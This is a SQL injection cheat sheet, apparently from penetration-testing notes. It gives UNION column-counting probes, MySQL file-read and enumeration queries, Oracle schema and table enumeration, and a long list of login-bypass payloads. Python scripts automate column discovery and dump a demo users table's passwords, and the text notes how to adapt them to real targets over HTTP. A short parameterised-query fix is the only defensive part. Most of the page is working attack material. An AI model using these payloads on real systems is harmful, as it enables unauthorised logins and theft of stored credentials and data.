# SQLi

## UNION Injection

UNION appends the result set of a second SELECT to the result of the original query. Once you find the injection point, you can use UNION to attach a SELECT of your own and have the application render its rows as if they came from the original query.

When crafting a UNION query, the injected SELECT must return the same number of columns as the original query. Use ORDER BY to work out that number, or build the UNION with one NULL per column until the error disappears. The other tricky part is that the data types must be compatible column by column between the two queries: you cannot return a string in a column the original query fills with a number. NULL is compatible with every type, which is why it is used for padding; once you know the column count, swap a short string such as 'a' into each NULL in turn to find which columns will carry text.

### Getting the Number of Columns with ORDER BY

```sql
ORDER BY 1
ORDER BY 2
ORDER BY 3
ORDER BY 4
...
```

Increase the number until the query errors. The largest number that still succeeds is the number of columns in the original query: if ORDER BY 3 works and ORDER BY 4 fails, the query returns three columns. Append the database's comment sequence (for example `--`) after the number so the rest of the original statement is ignored.

### Getting the Number of Columns with UNION

```sql
UNION SELECT NULL
UNION SELECT NULL,NULL
UNION SELECT NULL,NULL,NULL
UNION SELECT NULL,NULL,NULL,NULL
...
```

Add one NULL at a time until the error stops. The number of NULLs in the first payload that does not error is the number of columns in the original query. Judge success by the absence of the error rather than by new rows appearing, since a row of NULLs may not be displayed.
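The two counting procedures above, automated against a deliberately vulnerable query. This is an added example, not code from the original page: the SQLite in-memory database, the `products` and `users` tables and the application's search query are all constructed for the demo. SQLite raises the same kind of error as MySQL, MSSQL and Oracle when ORDER BY points past the last column or the two sides of a UNION differ in column count (only the wording differs), so the probing logic carries over; SQLite does not enforce column types, so the string-versus-number probing step is not shown.

```python
"""Added example: automate ORDER BY and UNION SELECT NULL column counting
against a constructed vulnerable query on an in-memory SQLite database."""
import sqlite3


def make_db():
    # Constructed demo schema; the users table is what the attacker wants.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(name TEXT, price REAL, stock INTEGER, category TEXT);
        INSERT INTO products VALUES ('widget', 9.99, 10, 'tools'),
                                    ('gadget', 19.5, 3, 'toys');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'sup3rs3cret'), ('bob', 'hunter2');
    """)
    return conn


def vulnerable_search(conn, category):
    # The application concatenates user input straight into the SQL text.
    # This is the injection point; the original query returns 3 columns.
    query = ("SELECT name, price, stock FROM products "
             f"WHERE category = '{category}'")
    return conn.execute(query).fetchall()


def count_columns_order_by(conn, limit=20):
    """ORDER BY n succeeds while n <= column count and errors once past it."""
    for n in range(1, limit + 1):
        try:
            vulnerable_search(conn, f"x' ORDER BY {n}--")
        except sqlite3.OperationalError:
            return n - 1          # the last n that worked is the column count
    return None


def count_columns_union(conn, limit=20):
    """UNION SELECT NULL,... errors until the NULL count matches the query."""
    for n in range(1, limit + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_search(conn, f"x' UNION SELECT {nulls}--")
            return n              # first payload that does not error
        except sqlite3.OperationalError:
            continue
    return None


def dump_users(conn, ncols):
    """With the count known, put the interesting data in column 1 and pad
    the remaining columns with NULL. The category 'x' matches no real row,
    so only the UNIONed rows come back."""
    pad = ",NULL" * (ncols - 1)
    payload = f"x' UNION SELECT username || ':' || password{pad} FROM users--"
    return [row[0] for row in vulnerable_search(conn, payload)]


if __name__ == "__main__":
    db = make_db()
    n = count_columns_order_by(db)
    print("columns via ORDER BY:", n)
    print("columns via UNION NULL:", count_columns_union(db))
    print("users:", dump_users(db, n))
```

Against a real target the two `count_columns_*` functions would wrap an HTTP request and look for the application's error page or a changed response length instead of catching a database exception, but the loop structure is the same.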

## MySQL

MySQL can read a file from the database server's filesystem with LOAD_FILE(), provided the database user has the FILE privilege and the path is allowed by the `secure_file_priv` setting. The function returns NULL rather than an error when either condition fails or the file does not exist, so a NULL result does not mean the path is wrong. Place it in a UNION column that carries strings.

```sql
SELECT LOAD_FILE('<path to file>')
-- returns NULL if the file is unreadable, secure_file_priv blocks the path,
-- or the user lacks the FILE privilege
```

### group\_concat()

group\_concat() takes the specified column from every row in the result and concatenates the values into one string, separated by a delimiter (a comma by default). It is useful when the injection point only displays a single row, because it collapses a whole listing of tables or columns into one field.

```sql
-- column 2 must be a column the original query returns as a string
UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
```

<https://www.w3resource.com/mysql/aggregate-functions-and-grouping/aggregate-functions-and-grouping-group_concat.php> <https://www.mysqltutorial.org/mysql-group_concat/>

#### Clauses

The full MySQL form is `GROUP_CONCAT([DISTINCT] expr [ORDER BY expr [ASC | DESC]] [SEPARATOR str])`.

- `DISTINCT`: Eliminates duplicate values.
- `ORDER BY`: Sorts the values before they are concatenated. The default is ascending order; use `DESC` for descending.
- `SEPARATOR`: The string placed between each pair of concatenated values. By default `,` is used.

The result is truncated to `group_concat_max_len` bytes (1024 by default), so a long list of tables or columns may be cut off; if you can, read it in pieces with `WHERE` filters or `LIMIT`/`OFFSET` on the subquery.

## Oracle

### UNION

Every Oracle SELECT needs a FROM clause, so a UNION payload must name a table even when it only returns literals or NULLs, unlike MSSQL or MySQL. `dual` is the usual one-row table for this; `all_users` also works because every account can read it.

```sql
UNION SELECT NULL FROM all_users -- any readable table will do; FROM dual is the conventional choice
```

### List Schemas

Oracle does not have multiple databases inside one instance the way MySQL does; the equivalent of a database name is the schema owner, which `all_tables.owner` lists for every table the current user can see.

```sql
UNION SELECT DISTINCT owner,NULL,NULL FROM all_tables
```

### List Tables

```sql
UNION SELECT table_name,owner,NULL FROM all_tables ORDER BY 2
```

### List Columns From Specific Table

Oracle stores unquoted identifiers in upper case, so match the table name as `'USERS'` rather than `'users'` (or compare against `UPPER(table_name)`) unless the table was created with a quoted, mixed-case name.

```sql
-- table names are upper case unless created with quotes
UNION SELECT column_name,NULL,NULL FROM all_tab_columns WHERE table_name = '<TABLE NAME>'
```

### List Columns and Table Names

```sql
UNION SELECT column_name,table_name,NULL FROM all_tab_columns ORDER BY 2
```

### Get Data from Table

```sql
-- each selected column must match the type of the original query's column
-- in that position; wrap numbers or dates in TO_CHAR() for a string column
UNION SELECT <COLUMN>,<COLUMN>,NULL FROM <TABLE>
```

## Authentication Bypass

These payloads go in the username (or password) field of a login form whose query is built by concatenation, along the lines of `SELECT * FROM users WHERE username = '<user>' AND password = '<pass>'`. The quote closes the string literal, `or 1=1` makes the WHERE clause true for every row, and the trailing `--`, `#` or `/*` comments out the rest of the statement so the password check never runs. Which comment sequence works depends on the database: `--` is the portable choice but MySQL requires whitespace after it, so append a space when submitting those payloads to MySQL; `#` is MySQL only; `/*` opens a block comment, and whether an unterminated one is accepted varies by database and version. The `)` variants are for queries that wrap the condition in parentheses, and the `"` variants are for applications that quote values with double quotes. The last payload in each group is for applications that hash the submitted password and compare it with the stored hash: the UNION returns a row of the attacker's choosing, and `81dc9bdb52d04dc20036dbd8313ed055` is the MD5 of `1234`, so the login succeeds as `admin` with password `1234`.

```sql
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
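A few of the payloads above run against a deliberately vulnerable login query and then against its parameterised replacement. This is an added example, not code from the original page: the SQLite in-memory `users` table, its plaintext password column and both query texts are constructed for the demo. SQLite, like MSSQL and Oracle, understands `--` and `/* */` but not `#`, so the `#` payload is rejected here and would only work against MySQL.

```python
"""Added example: vulnerable versus parameterised login check, exercised
with bypass payloads from the list above, on a constructed SQLite database."""
import sqlite3


def make_db():
    # Constructed demo table; plaintext passwords keep the query simple.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "sup3rs3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    # Both inputs are concatenated into the SQL text: the injection point.
    query = ("SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(conn, username, password):
    # Parameters travel separately from the SQL text, so a quote in the
    # input is just data and cannot change the statement's structure.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def try_bypass(conn, login, username, password="wrong"):
    """Return the user the login function authenticates as, None for a
    rejected login, or 'error' when the database refused the statement."""
    try:
        return login(conn, username, password)
    except sqlite3.OperationalError:
        return "error"


# Payloads taken from the list above. The trailing space after -- is kept
# because MySQL needs it; SQLite does not mind it.
PAYLOADS = ["admin' -- ", "admin' or '1'='1", "' or 1=1-- ", "admin' #"]


def run_all(conn):
    """Map each payload to (vulnerable result, fixed result)."""
    return {p: (try_bypass(conn, login_vulnerable, p),
                try_bypass(conn, login_fixed, p)) for p in PAYLOADS}


if __name__ == "__main__":
    for payload, (vuln, fixed) in run_all(make_db()).items():
        print(f"{payload!r:24} vulnerable -> {vuln!r:10} fixed -> {fixed!r}")
```

The `' or 1=1-- ` payload logs in as whichever row the database returns first, which is why it is a weaker choice than `admin' -- ` when you know the target account name. Against the parameterised query every payload is simply an unknown username and the login is refused.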

## Resources

### General

<http://pentestmonkey.net/category/cheat-sheet/sql-injection> <http://www.securityidiots.com/Web-Pentest/SQL-Injection/> [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) <https://sqlwiki.netspi.com/attackQueries/executingOSCommands/#mysql>

### Authentication Bypass

<https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/>

### MSSQL

<https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/> <https://www.exploit-db.com/papers/12975> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MSSQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)

### MySQL

<https://perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/MySQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)

### Oracle

<http://www.securityidiots.com/Web-Pentest/SQL-Injection/Union-based-Oracle-Injection.html> <https://cheatography.com/dormidera/cheat-sheets/oracle-sql-injection/> [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL Injection/OracleSQL Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)

